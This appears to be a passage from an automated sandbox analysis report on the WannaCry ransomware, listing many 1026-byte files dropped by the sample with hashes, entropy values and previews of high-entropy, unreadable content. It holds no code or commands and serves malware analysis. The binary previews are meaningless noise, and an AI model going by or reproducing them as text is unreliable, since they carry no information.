                                                                              Preview:.;`..Q."?.n.'.."....@..g....7.....l.*.F...."(...B.5....}....Q..ea...c......9.D(Rl.2.Z.0.oCc?=M..&.K..t..l..\GM.]F...fm......Z.R..\.6.n|.%...).....J...,..b|~k.V3.....G.r...t$.........M.....-...'i2zl...m..GG.:..|N!D.G.^.y9D..C.#H......^p.>.x..X.._..o.n...a..%P<3zf.H..@.VK...PO..I.j..X....s....+.......k..s<...0..u%...[Mv.......'......X...w.h....Zh.6..s2.U.....U...p~"[......;e.P.P.....2.....<!.l...\..o......0>.^..r,#.G..N~....rW.:.R..|J.GT.j....*....Xo.J..9..oid.p. e{#...!v.&.K ......f.T'.:.:$...e.7..Z.....m/..#........\H.^!(ty.Q..2.V....i.....6...N........%.....y..5.w.3.0...T...d\'}.fp...".0 ....S.'..x...'.......@.....k...n...C..'...+..;.;..+...5.E....."..=./.sv.%..<f...._.V^Z.q...u..eH..}!.1....F`..BD.....9.-....;9...dhf'...!q.".aG...|..%..T5H.t..*JN......vqW.r....m....0hU.U..t={...._Rb`.......... .}..%....V...%...9%VB.mX/Vd.#L.l.....T.....H`X.t...4....>!...^5vX(.q\...l..A.k..x..`7h...hE.qb..2r..)..S.S.....ee../.e..p..m!...ory.........C%..C5.....;
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.820473708302825
                                                                              Encrypted:false
                                                                              SSDEEP:24:dr9tkIhqBDaQ/Leo7OjBOSKZSA6BaMxvRB07JUi:dr9tkfyo7O0ZSdfVb4n
                                                                              MD5:9DF9725D733BA8C2439F768BA4F8377B
                                                                              SHA1:512B7FE8874577D2F8F20AF295440227618F75FA
                                                                              SHA-256:BB9DA944514C59A4A3C0EDFE4D75C0FAE70806C34FBF0DF131E081008C92A28C
                                                                              SHA-512:898138B4B532A6B0A11A9D524DEB6AA71B65A6FB733055D2B7D9D1B1CE5522E1ACCF7F1AC3B98F225CC6B249FDA510D40ABA5A217E2208D2C9C598A0BC5CB587
                                                                              Malicious:false
                                                                              Preview:Pz..._hW.sG^. c>.^.?y^.O..%l..@...w..y...s..d..Op^..wiR..G.Y..".#.Dlx.$.O.l..J..P.I_-..7K)(....G..C.w..U..['.\..PE....s^..cn.-\..C.e..l.'.qFY*....zZz....qK..g#...]A.V.[........$....z.?...m...G.cu.N..n,... .gs^...k.=).sW.Wm.z.o..*.de.."-...%..y.E.>f...M ...;|_Nbp...Z0b..r.Q.`.....`...OG..J...g......).=.......Rz......V...!KZW..6G..DrF|..P.Z.7...b..h.....WJ.D...=^..t...;i.....fl..L:.-....{`\..kp.'a.........v..$..)..v...6.h..0%H.....Pd...K.f._C3..Rb... I..\.1(Y.I.[.8..o.O...G...^....A.11............z.jD...f74o)......*..^.,.&..G...q-.....\..OH...m."..vV.].|.......{j.X8.`,t.b..u..`...~.&.....J.m]...pq7Bf.\e..SIj.....CnWoK.p....dN.....6i..X.(.t....e..o.|i[p<:..C4.4..+......k..O.+.`../..QT,.i.6.)H...aN...<,($-^mK.f.5....<*....,B..z....l.....9......'....1J.../........?@....FBe.......b.7A...Q5Ju....@..f.O.....8/]...`<D...t.....o...;$....('....6.sB...N.<Hs.K.L...G. ............Q.H...].O.S...8j.~^.',0..x.3.J.....S....+.N.b.8..H.V.*;g4...&.-....u>.y...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801300603535415
                                                                              Encrypted:false
                                                                              SSDEEP:24:wQqi9I+RcHYEj7XDpKZrMtUMMRhW1PHYJ8BArLCgR2:fqi9QHZkZrMtUMQhW1P46Kv/2
                                                                              MD5:0BBBE00125E479434B53A2B3B246BB27
                                                                              SHA1:B27F0BDF5B7C8D70B119E2218AD565787CE6C662
                                                                              SHA-256:3CDAE00C79C5D667D0BC61E72A5BF8CB7B807647306390B82FB886D183B17554
                                                                              SHA-512:4D18DEAB6F31B476BC3D8FD02BAA4117D1092F88D89F23B3145E64153C811E1242610C6E531AE948300CDCDEB1D6370AF5FB58FA693CD02B54C1649FDE2DAE92
                                                                              Malicious:false
                                                                              Preview:+.E-.&Hr.E..h.J..Gz .luM[....k....m.Z..Ui;.....Q...|.%4./.dh..'...>.....hV.a.v.I..R.)....a.Z.......G..@,$.7\..i...G..J..Y.h6)J.......J...W.=q...+o.._..^....Q..T...W.v.s..:.L.ja=lA.M...W.<u.....-.2.@e=.K.#B..`>.....y.....C}...8..0..xx.o....DS...-.{.'G.r/.....V.J...4g.N...t[W....i.]....".`S..Y...w...I....(. ..}4%..O.W...&.b.B.m.H....y6o :}._.,.+...k....,...{.L=.mEj.....bJW..c.a ..p......r.dk.C.G...)F.\.R4...j...>..U)Q..[...~.s..C...r_a.....K...[jv%'...N........K.8...w.$7..o....}$9..]..W...?....%"|..P.).g.9..o........;..!.lR....[S......'..d...fa....:.RY......h.....Y...&.Eo.?..7.<h.....;E.yV..bz?GA......ea...<..[S..(...Vk&z..j'....#D.|..0...[bU.L^...K....~pL.d..@.kB.).....M.LD#.XL"..k.....JQ...{..H..V.|...f.$ae..."...%@|....@.%....V._..>.<S.TDe...X/..^u/..Dh.5P.....s$V ..c.6.j^..WU..=2.....T.yz..y.E../.n.......W.]..).Y.......S...n.0..d`...y.*p...}]._}..R....n^..s]e....pD.mX...x!....2.E:..y.Pbk....7.....}..^;......NlR."..~.|e./v.d....+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.779129717038513
                                                                              Encrypted:false
                                                                              SSDEEP:24:NdcqskyDWjmWsLXXMDgx/EksMoqR/80/G:NdukyDUJi8DuEkvTG
                                                                              MD5:AE301426493B122688F899ED77FEAE79
                                                                              SHA1:331FA746CF28BC38EE34B6D7C2D99E41A6076A49
                                                                              SHA-256:92F7E7C414547CDCC387F990511BA69F1ABBAF6FBF4C2F6A29C2664FEC210DE1
                                                                              SHA-512:31B810D17AB676A0D20A2747F3123F3E0EE31B36387D1C7BD8D57B069D585D69255ED9CBD138CC340FAA5BFB41A45D8E60565F2A59563118245F1C79F7465E32
                                                                              Malicious:false
                                                                              Preview:...6.I.pq.*.....gX.5...h.Y..M...e....[..O/)...i...?.2...VjL.. ...s.~.....&*.......D..[(m0....R$....9.dB.......U.....!+...D2.y.<".....8...........l.JW.M.W.e+!..U..+D.....yM.9.~n.Nm...# W.....$.rZ.tx.+W...`.]._.\Z.gy(..?.d.24..b?@.J...+....Evg.7g........L.......J/.,.#... z...3........9...!...-#c.2u.?W6...g..@,:>>.TP..E.l.Z.......#4H9.N...Z. .l.J.4....lX.........v.)t.J.d{..E..z......?).....NJFH:..%u(-...x......4xTK.Q.._.b.....M/....d4g1k.*N..<..mh...^..E...T.......w.Ct~R......Q.........?.T...m;2.V..9JV...9...........k..U...R..N..-...\...D~.[JR$.T........t}.`.z........l..f........E..I..K.nam..;_...0..x..P..>..f..F.u.=Pj.....u.G..2..].@.)&U..4..k.....b.....Y......d...:xa.......?<.....|...w..m...?5........*x......F..p..Q6h.Sg......7:8...z..i.}.4u..J.W.....8.H.....T......ql1.0....M..|...[..x...16.*..t;.F..y. .U...E..:.`.o6.+........Q......wP.F..<..9...b"%,|;R].]..QH.W..Yp.)rd..........[T.yaSq@..:..C..|+.Y.....p......y^.`F<rr.v.....r..k[2
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.823714148704198
                                                                              Encrypted:false
                                                                              SSDEEP:24:dr53Vi2M3CmNZ0Xaqiz0VUGW77Bd2OL6FKeakcDRpQmac+7:x/M3Vqiz02RfbfZe6RR+
                                                                              MD5:3AA6FA464B3B1989C0BEF2D4E4884135
                                                                              SHA1:32530D7371C14B723435291F2E6AFFA0B7E2AFFC
                                                                              SHA-256:936EB387C151569BDB9EB10C19464275242E23EBEF65700A57CAD28E676F0C15
                                                                              SHA-512:7ED3B772100085A5BBFA3397BC20906D0DB938A8791BCD685F7C080F34BD7D31C5CABDEE3C320F7EBD520C94CE5DA9844AE496A5696DD92A5DDD27EFC5ED0BA3
                                                                              Malicious:false
                                                                              Preview:..o..kg._......gi...7...$$..B)...`...........p.4.....e...u.xG8.h........3`e..i:V........P.... #..[.../...<....'.U.....j.b...HJ.h.<.+.......Q."o-%,........]..{`.../...?d...l.(.(5..Wn......Woj:_2$0.&tqq.v.8PW...?...Y}+d?..c.n9...p....Z./4...~._m2IA.9A....e..;xv..._......p.....r./.A_....ep.)W"..R}s....!AL..J.P9..~.e&.G..Q<.h...S.(..3b....-...X.9.......OI(F~..QG....b>..c..=...l.Q*M...z.%`.[.&.|.#.....@VWA....<...cA..j#$&.....8o....0.......u..f.K.W1x.%.]At.K.3M.t....x......TC.G..&.D.u......)....6..s./.:.....Q...0....!..w...D8..Y....X.Q$q_'n.R..zM. .Y.p.m..u.d../.:..!...:_#O?ZB=..9......O.?!...........O.....W.Vc...<wd..w}%@)...h........&.....}Wj`p..I-..........S'.}./.5.........n..GL.........5T.sXf.a..E...<.............8H....F.\4.mR......2..p.S.`........L..&4.4..#.....f]...E%.r.Sk1oy..V...?.N..`....:.T.....XNH..R...Q(.B.a..h..Y0.,..!@..oR,3....[...~.Y..3]Dy....W66.Gg.:"_.....#r....d..3q.]).<......76*.u.1.2!hG`..1J.#e...g.F.x.0.........EC-O.{g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.813154710054012
                                                                              Encrypted:false
                                                                              SSDEEP:24:GTVY6H/crR+5lcxNDrf+TU+b9UzHm5wwHN2:wV5f183Ub9qSpHY
                                                                              MD5:0DC1EEFD35FBCFF974B3A42DAF0F32A4
                                                                              SHA1:5E1B90B000A17BB867DA05B5DC64B210E135A1A9
                                                                              SHA-256:FA2191BEE98CFD71412C89B156FD0B2FBAC4386A1E70CB3F9E268A4BE56885A7
                                                                              SHA-512:9EFBB42280E39763886622B99968AA0EFA5A06DF2A654393D06CD618DC51FC37F57B375A8122E244676E65EEF2D9699F3ACA20168B0273B79B360715019F56AA
                                                                              Malicious:false
                                                                              Preview:..m..+.............1.|.6......,e..J.E....60.t....qn..4.0.....z.....w..mO%E...A..8..r.}t>.Z.6..Sjt<.F.l........e..$...b..l....o.....'.q.;.|.+...mVs^..e.%'.U{.._G.n...1.L..n."h.{.)O..w.f.7;..D.4.Jj...."q[...7P.}.w.?.J...X...3...(.g;..<]........dI.......o....Z)...C.T6.l..$..'....BEO...=.....9.M.....~..,B..*hz}..HQ.O[.c.m.g...}.%.P..#l....^..12Q/.j.d..O. ..:...w*...J5U.0=.W5(u.. [..^.K.Y}w`j@...<\....2..Y.IbD.HK....>i..(...{..0<.&.}...L4..a*.P..6.k9~nj...8 .M...S....wN.....X.6..(.K....8b^..^...m.W}.;.@KrU.+...Mu&.P..R.U.@#..F`.....q.?.M...k.:..c>'K/........{.._..(.....s..w.w.+.:..."...d.$..r.)..i..-@>....._.7V..J..I.$.]i.4....h......W."..c..[....A..M...X........"....oZ......R..Y.'-j.=.L.9....R.(.y.Y...~.m..g...8.}y.~.1...N....AQ...My.h....n$..i.D]...9..b..k6..h%5UF.......D...Q..]......@..zPR.U(..>..5.v..Y.CT$N....1.....Fg.NbGUAp..'.r...0..O...0..|f.h......l}YM+...r:..K.A....l...............wM..f.Ij"..w.0B...P.s..n.....3..g...@...n?.(>.N..N9}.wz
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:OpenPGP Secret Key
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.803221394363508
                                                                              Encrypted:false
                                                                              SSDEEP:24:1l/4UEPD1fk3dsPuSjoJg3TH33xDwOFNQ3Arlq:kUEPD18gu0dT3xDFQ32Q
                                                                              MD5:0E7EC5A915B94D9206EC3B465E189434
                                                                              SHA1:15A06A25757B49CFD101B53646F11A1A458F0AD5
                                                                              SHA-256:C0BE393CCD38A9154D9E430C731B1CF84A6DE2ACF15BDFAE1ADE91A14099CED4
                                                                              SHA-512:14F9663360EF17F8DF5CE60363ACA75EE905C6BB893C28B2EAADB1F9DBC656601825AA56EF48AC22BF0F79A661CE8ADA3A93473E59B58FAD5E4E07D1C80FCD69
                                                                              Malicious:false
                                                                              Preview:.M,..j"G..y.[.rf^..t........f....a...1a...@.>.G.......v..iD<O.E9..*@...D.`.+K.=.rp..~.........a.K.;3.....L.#..s!....5..3.W2.................(./.:..(C..J>M..<uD..3....{....X..C.!.Y..W:.L>...m.?.S...K..t....OG3s.MkX".D.......?.......?~h.&...1....s.D.'.....u.sC..;...AT.m..;,.6....6n...#=.Pn.........)?y@f.j..#9..X..d.y8....n..*..*.|K7.9...\m..h..N........w..u..u..xD........UU.0.z5c...}E.aM"dx`.`...D......!W....\..?>..Y........|.q....a.PV.......nQ<.m.+.../Zk.*...G7UL.<.Z./p....m..4.#..A.m.../kH~.8X...{.Y..>.Z..._....)..bAl...S.h....3J.?}.....+...L..LLY..x.......(.D......<......:u..../.X../R{.......Q..D(.F..E}.lE$.(.Q.x..........z.....4. ...(....h.(....OR.SyGs."..9.\A...[..Y0.....b.:....R..[H.L..D.L......E.....c^..u"IG.a...ty|..m.R..B.5[`.. ...Z&.Di......?....p..D..K.`........>.........l.O...7....i.7..S..!..........r......R...3J_.........s..B<....1oYu.)_..J.......t.13...z.*S..'P..+..wb%_A.n.M...Oe.*..D.E..Bq.......'U......F*u.....Rlv(..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.838258265099937
                                                                              Encrypted:false
                                                                              SSDEEP:24:9Y5NFJ1dJmEuY9C43sEj2h0GDGM7vTcCj:W71d5C/feGDGo9
                                                                              MD5:5F8C8AB1BE5CCB090400A090C85DBC58
                                                                              SHA1:751CCC049441F9F287C68D1FFB9A4EF6A8CD63E4
                                                                              SHA-256:378E50BFDCF4F639CF5DADECA60D4F9E47355B9FFBCACA6978C7A1422EF84AFF
                                                                              SHA-512:32C3A2915769917770E70BB5F176C0BC50DC4D0148489A428931C741C181BE5270FC8D20B39FCF4BBBC6241A0AC74492AF54335A9E267D5B834B6797AD01B436
                                                                              Malicious:false
                                                                              Preview:?9..q$Uw.EQd...6!Uj'#VJ.M..&.u6.R.R.qV.l.....Y<).'.......5.#fv..E..\....H,.Zp[.liO(?Y|.G..D,$H?I3.'.........s...m!.F.c.":. ...%8;..[.....s.Z?...tlT.T|.%...`b.......s....d..R&`....o...e..?.F.H.A..7...........4.E.9...Wb.Hm".....M..{M.......?...IY.:.{...0..8.%..........U....1?..\.....=.0}5|M..;. ....x^&....s.....R.....[......#.bx4..>.G(...b.x.E!..wt...V....n....B.@Ct....c...(j...<B.B..p...<.z.l>.....?.\.$./.9L=I]y...\.{."........<.)?.Gp...T].Jv.;..Z...4.ZB.j....4..a?(..R<.~]-.....I.Y.sH.MCtUn.W.+A3.2...?....H.On...(..'C.....p=.j_..O.....g..5D2A.I...s.P.zb\.'.............`.......]VC.:.....hBv..Da..k....SP....8..iF#U].+..........'.!.-..=.......S...l.a<.{..8[.n7a .K/..!.'....8..*9A.....E...+...........$..L...b.!Q.P.:....d.....AM...e.]8C.[...t[..F..Z._.J.....0.9p~..[...8F....A$.....wk..7e .}k..w.C.....T:.xF../X.z..^}|..b.0.".4...M.h.}../...9.!.h.U3c..8.Jk..1f...,1.W/..-Tu?sT...i@Y .f.e.P...r.gs...j.R.z..1...{..@B...qc5d.zw+.P}.c:.h.FH.\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.80845255559452
                                                                              Encrypted:false
                                                                              SSDEEP:24:y568/H3kzdCOu9JnvJgHN1z2tezte5GSy1rKs9Jl:yqd4GHN186JSYp
                                                                              MD5:08C7946E9BB1D4B8E6B304ACDCA31091
                                                                              SHA1:7356230CDCA75E8E69A4E0892712C2F7C4303DD1
                                                                              SHA-256:6F52FDFC1EFD8C0A18781B900B581E6FFE9D32623CEFB3565C734B36975D8026
                                                                              SHA-512:F725C5BF2F7DB80A7E70BDB79D29965CCF09A3E0D716546B201EA0628C34157F0E4769FF96B0405AAD7AA86AE6CF7232164234ED85F1CD9034948D159DE56B6C
                                                                              Malicious:false
                                                                              Preview:.=.....3!lP.E$2......9...#Q..g..D.....V.quy<.R.......!......}....../.e5.%d....y...-.I.....1`BM|1...Y....nVh.cg......v.M.-.(..q. .X5;.. JD7-}u..2..PZk...5...Z...TN..t..v<V...|3.9...L.}.|.p..r.>....w..Zc0X; .6.rR(..N.sQ...8C......F..A.....@.....JP...K.8...[.H@..y....sQ....;..p.R\)w..:...[...`.O....l.h#..?...I.........35s.Fl..(...M...'. ....v.-!..........k.v..#].~.Y.K.c.;}#4..l..K....O.)Y.O/%..S..@.V.^~.\..\.T.N]..][.[..&.4<..n"....0.~v!.......2j3...z..0.m.......bf...&X7H^!.~O.l.e...-w..~...(....?..@.^".....^k.S.d.._..;..;.>...';..*..........l...H.....hT3.....a../.`....I.Z}..\.\..rN.7.....L.B.E....04.e......EK..U.d.,.&1..5......v....N...../...S.....k/#.u..^<..4H$..7..+oT...;.D.*9u%B.....*.+.4.........S,....e+*..^J.0..i.!.. :..RE.7gt....d.d'wj..p..^0.#..B.\<~.....@...2Yo..r...#.!IEQ..w.$Z..E..7.a....#..i.,^..^G....p,.=.+Kx..:...l...,*~..A..-.T.pfY...Z.V...V...-.k...F.m..U].......g...}....Y-...."n..D+.I...Q ..)../...N@IUY..;.Oq.xK......6.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.7978929183400725
                                                                              Encrypted:false
                                                                              SSDEEP:24:MVcTY4hXFqx1BUmx1NjR/inR85kG733onqifhVkKbeLzl:5Y45o3r1N9UR4Yobzl
                                                                              MD5:9982E2BE827EE6CA3B730E915CCFF838
                                                                              SHA1:4B666C081BEA525A8B41C88220CCC8936374AF45
                                                                              SHA-256:0A0C4669DCA468A194982409C3C69E1B432FB1CDB466C0E1175B134ABBD69AC6
                                                                              SHA-512:B7F85D7F77807F504FFB07C050C7577E1B2CFD14A2937F14FFD18323FC23B2058FBDC887A8D05FFF259F71A2A16FCB53D0E9430B0E2C08245309F714F9D6D308
                                                                              Malicious:false
                                                                              Preview:....|..d.....&s........%<4.*..p.;.Uo.z....YP.t@..@..oT.%.....4.pU.w..L..P.o.4...L2}W)Y.E..FL....ow1/.I.-E. ...|.n.70E.B.=W.4...u..m........L..eL8u.5........%....t....9p..VOO....[.w...0...<..|.`v.......D....Az....L....'|.../.."X.^......FK..'%.r.L4.d.{^^......L.I6N.......cH...G.>.a:.)s.i.-.._.._..I.r...6.5..v@dX.......(..B..&....9...D.<C..N\.1X.....x......T..O......^.}.>...n#&.56.49.S.Z.........>.K..2)2.k...d-?s/3G.;.n4g..A........u. ..qf.......R.T?...<..9..H..;.Q.R.....`_.!....I.P.!..(g..^..pT{.X....f..H....D{......." E1..p..}R~....8.}...........V.yL.d?0.\....W.....)..$.3\.....*..C#.`e..../..2..I.|./.Gh.^.B.*..?1\.m.qD.@.........@0.Tv..Z.....o..t]+..#...&.f..1PW.c..5...A..h..O[...l....`\.q.........V..eAJ....K.|...X.5.p..7......`.!.....v(...$..L../..6..(.M4...;sX.Q...=.L....Q.k..[7r.G...S.t....N..q..d[n...>q.....F..R....K.b.}.....b.f..... .<..e. Q.~.X.^.8b./...u2rf<..]....1.T.iW...3.f.....d..........[..E.0....!*T@>o...L..[...d..;
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.805321107143964
                                                                              Encrypted:false
                                                                              SSDEEP:24:hTIpbjx+gTQE7eo1zCqUn1DvqSSrfDA0x9JJMOqu5soX1X/34LvZbQ:FISg5y7r1zqSSrfDA0QOqaR/2ZbQ
                                                                              MD5:95D1FC2460B85A4D26985217AA8E8926
                                                                              SHA1:3220DDEBB1DCC78D50EAC6EBCA9F9AA882D18692
                                                                              SHA-256:65D9F4DD7879DF07D734F97FD220A5A1CE7AA124FB6F52F7BB0DAF3EE1A7F5B5
                                                                              SHA-512:6E8A2E4B8C5F5B20AEC67FAE927F0C2FB5A6510CB03E51B8932AF9DA6C92F623290C842B8C233B45684A7B2815FA5153A20E8FC73195044997BD30FA33B419B4
                                                                              Malicious:false
                                                                              Preview:....r....G6..2.P./.V..!+......r...5...61../.Zu.&.q...v.....]..o.......ho..f.*....nJ\yf..*.L...[i...-a.vB.E%....h.6.Y.,.......K.>...I ..t...i.....H..s..L6_O.0..r. A...I$"..y..:._.E..AH..Z......,..`.4....#(.W.....1..?,oE.7%..Q......?.vI.....ln\.....(F$...T.e..96..V.5.c...'j.G_.#..W70.{..wW.H.sU..........(.....-vD.4..:G...m...<..^G..'@U.........`.......5..O...bf.4p.P7_4....%..:./0.-...,...6.`.`j=................|;0..JJv..=...o.......).dff.DE..u..<96.. .........h..d..2[6.......{w.jG.P./)S.I~.......v..Drz....B...xv...'....$.C..8.!6.....\yt4.B.f\fj=K.O.j.Hv...6.bZ.oK....^z<].;...+.#"3...#+v..=|A&..X...`;.|..H.K...Bg..~.;a...z.>..^\.J%.l.a.....YYx...-..X.....z..$[...m...*.4.;.'..seL.}........S.[!.[. .u1Y..V.0cD>..bi.....pg..;.....p.u.....0#C..f ..\...d...*g.#(...uW..O.t#.U.y.H^..Q..\....<..f....-M.`......P.g.J...$%....."..D.q..2R.].B{[..........Vxj)}.I..)d...n{..f.....H.KI8.9...R.4.....z)...F.LI;...K.<.c3.g_...r*_...de2...`.].(W.M.T4.Tr..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.788972631194496
                                                                              Encrypted:false
                                                                              SSDEEP:24:snm+IpTXddtcycZqjb+DWkx1Lsr5UwfBnw1zy104LUP:sTI9PtcyPv+DW08Uowxy1jM
                                                                              MD5:8562C618CDD2323736849B75760E3258
                                                                              SHA1:AA68E033E02CFD25E9A865C99BD7023E6F0BA88C
                                                                              SHA-256:33457234D4D181511CAF9E7D110E17FCB8AD5503FC7B2E8EF031A905C5AB39C6
                                                                              SHA-512:A1624A98C9704235B66ED93B779D9C89E2A9A12C66C6034157450EF33014EDDCA8B744A9066F2A6B4B7C971666EDFD8CCE88B8AA1A10115983E85F1AE1864FD1
                                                                              Malicious:false
                                                                              Preview:.."K..........As?.M......y....4.G.....I..8)......7.4.=.j......Us...[`.!0.w.tf.`..;...(.......W4.j..e/.L...HT...J.....`]:.;..S..G.b.0.Z._#.t.7........+.x$..:....o..U.....H./_V;...N&Hw_!4q.].)<.....,.b.j..X.y.......w..\@+..\.~..M._...........).N..M.........\.[WY.,...P:..^Y...h.7.......K..W.n...`.p],.k..8z.k.\.rf.[.1......A..(...n@9:>G.a..fC.j....:..9....3...]&Ls....8.6._..9.n.A.J.._f./.+}q.k.{U .1.LX_.i..L.....!....P...;~..G.a.A^.eZd.co.L.*....%.....I...k.....qN..9N...,;#1.....&au..p,+..gc..d.A. ....V2VM;...S..z~..;.Wt.0.p..[...}....#.r...=.WM..p.Ko.C...,.2.[.Wvz....YT.Z.......tKV[..oZ}%T..Y7.....X.vO...........?v.?...bJ.N.....e.c..B...@9...J...q<...].D.`.B....P!.).OZ.... ......|..I.Z.w....._S$.6.........J.C..o.^.*+m.Y..L.&.......@.R......o.6..h.Qo|R....L.%q`..........R...i.._.J!K=...&..u(....,......=z...:..I?.....').j..(.."....B.8...E...K..zR...,.......Cu7..C.n.]...z...uN..... ..@...[....7g..l....o.....V.a...l."..l6....o..{.<..X..,.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.82955093260985
                                                                              Encrypted:false
                                                                              SSDEEP:24:MB591TpxGnKQKgXfTDg2TrLBji5o4GPlsnrmkpBeJb:an1TpxbdAng2TrVjao7omke9
                                                                              MD5:C57D70DD0880B2BE984167655990A782
                                                                              SHA1:2FF1C83D8080A26B56D224A735012773912AE713
                                                                              SHA-256:FE53972F80598FE134CBF2136B395D6035ABB89A3329ED68797B24E8FF548BF3
                                                                              SHA-512:75DCE3305DBB9B0258E4AEF9C14FF930B29BF5F07A32E16B11643203ED003F3ACFF5813F78C157B2B20D6324EF7C9BEAF7002A1F9C415D8F7A33F91CEA2C5935
                                                                              Malicious:false
                                                                              Preview:BIF....Kwdi...g2.}p.kn.z....R."...b..o@oVj.(...*x.=q....w0H..ATr..?v...........kl...+..p.C>.+...!]..J4.D.6..9..?.M..{:J...|.u..Z%.=.W.....R..q.ls.....m..V6'....o..).j.O...{.\..P.&.s6~!f.3.V#..g.=`O...?.W...@....R..\...n....B..!..*.VA..........*..@.ws[.1B.G..1<..,.b..=$....:..w..(.|Q.....2.N....w......G....z.V.....1...+E...$.e.W...#.u.../X...Qvy.1c.+.KJ.....(h3-...0m..av.....0m.Nr..+j./gV'x.%M;.q7.....T.....{.....\.X...X...$.:.e.#J..*.>.......C.;.n......d...G..._.V.7[....[v..."...v.G.....}O~.B...}..^.........kK....}...j....C.p..s.3...R..o.n..!D...Y9]F..T...Y..(..w9._....=E.[B...s><`*D..ll..8.0_$...........+...t.*~Z@..~...g.v....KR.....:i~>..;Z".w..S...R...`Kq}D.Z........AWK....Vw........eN.....A.*..ef.............fD...u.kLy.-w. .8'i.......8.*F.8......V..h.....r(..I$[a#.....x...-2O.....fC.....V.-.h.m.?..S.A 7!....v..3.,..j..f,7.m..........i<.,R..=}....Z.k_.H..3"....N...o...^.i.g.t64+..C. .>..^.]...2Y../..67...1h<D.....H..0...W..g..{.....J..h`.Q
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.785106458347604
                                                                              Encrypted:false
                                                                              SSDEEP:24:+v9H/JT+nNvRDG6muwOIKlwKmwlnK2SyO1Jf4Ap5tfGYbw5mg:+v+nNJDJVIcXnRuJQApDfTbwgg
                                                                              MD5:6CE86D44EB6E627F8035FD2B0CD7DDF6
                                                                              SHA1:04DF1985BB38757CFD526162CCF630E3E375140A
                                                                              SHA-256:0AA6CD7ED348F0A9CFF2CF0FDB4D272D6B45497925439E4BB6898A5A87A1B8A6
                                                                              SHA-512:8C1D56ACA87523465C6CA23523B58955862BF8C695CF7455D173E5555D6DF8E50095A082E9465FB2F106446296921DB508A828164A8AF0EF56DFD07FF3AB3B4E
                                                                              Malicious:false
                                                                              Preview:........+8....a.T..l6m6..Z7..\i..-...O..../.......A...!..=...*&\...yS.%..5..x......[.c......5..s.\s..'V.....K..Z...Qia...-...d.p.j6..!F...!.-.;..Jg..;.6A9.O..=...gk!...<V.. m..t.;...G9..9.. 6..B.O!..t.j.....[...j....~. #.u.6X.s...w.iv. .AC`.0A..z..FH.X..] W...89kA..(...~gp8E.kN..o..].Kst....K...`d|.PJ M.%....z..,H)......Rp.R.._...k.....X..qs......~.A.q[. ..p.*.B.4....m.....H....&..{......D..kI.8'..~]_...p}o.z..t<.8.O..6.Z.J7}2........b.qS..$.NO:.$wlY6c..GV.._.L;LJ.=.m..z.e..Ww.h-.]&d. Z. 2.+..Yv..H.d.O....%T.0H.r.r..y.x...r....?.k..8p'}..V.F..<#..BA4.2.Q...l~8...I.r.$.. ?.E.H;...iI8....Y...xc..9o;:0..ns....]@o.:..[.\x....5....=.1..*...f.l.n.G.....}../.r.'d..{0..rbH......N.>gc.........r.uz..e..o..!..L......M..a..T.8f.#'...Qw..2U...*..j.L'.=@..>&*.%........\Y7w..........ek.j.d.!....UA<..F.>.:?...>nD/7......oBi..F. u0...JL.96}[..=.* . ....P.._#...B..p.[.u.2.(...p.....0...8...I|q......s.!.$...5R.3.H.kU~a.-......1..\<.Y|.=.To....B...59-.&
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.818852852187806
                                                                              Encrypted:false
                                                                              SSDEEP:24:t/IZSi0lKOGnwvBb2d9kZ/VjbzRQz4ldUW5Wdr3pY:gSbwOUoZ/VjXRQklqWsdrpY
                                                                              MD5:C22863544CC67C3D3620253BF0D937FC
                                                                              SHA1:4941A571168EE6C8D0AFED5476BE889096A9B3FC
                                                                              SHA-256:503CF8B9B37B971CC6F87703F429792D5D0BC0400D2A04B2E6EAAD342BBE6BCE
                                                                              SHA-512:D3A32CEDB22F7BA3BE3D609406746C46E8CD321509A1D0A06AC7C272D88B0ED34D26D0288C8B9C72A18AECC7157F0E7DC4587104A09A6FDF0A35F0E0FEFD5AA1
                                                                              Malicious:false
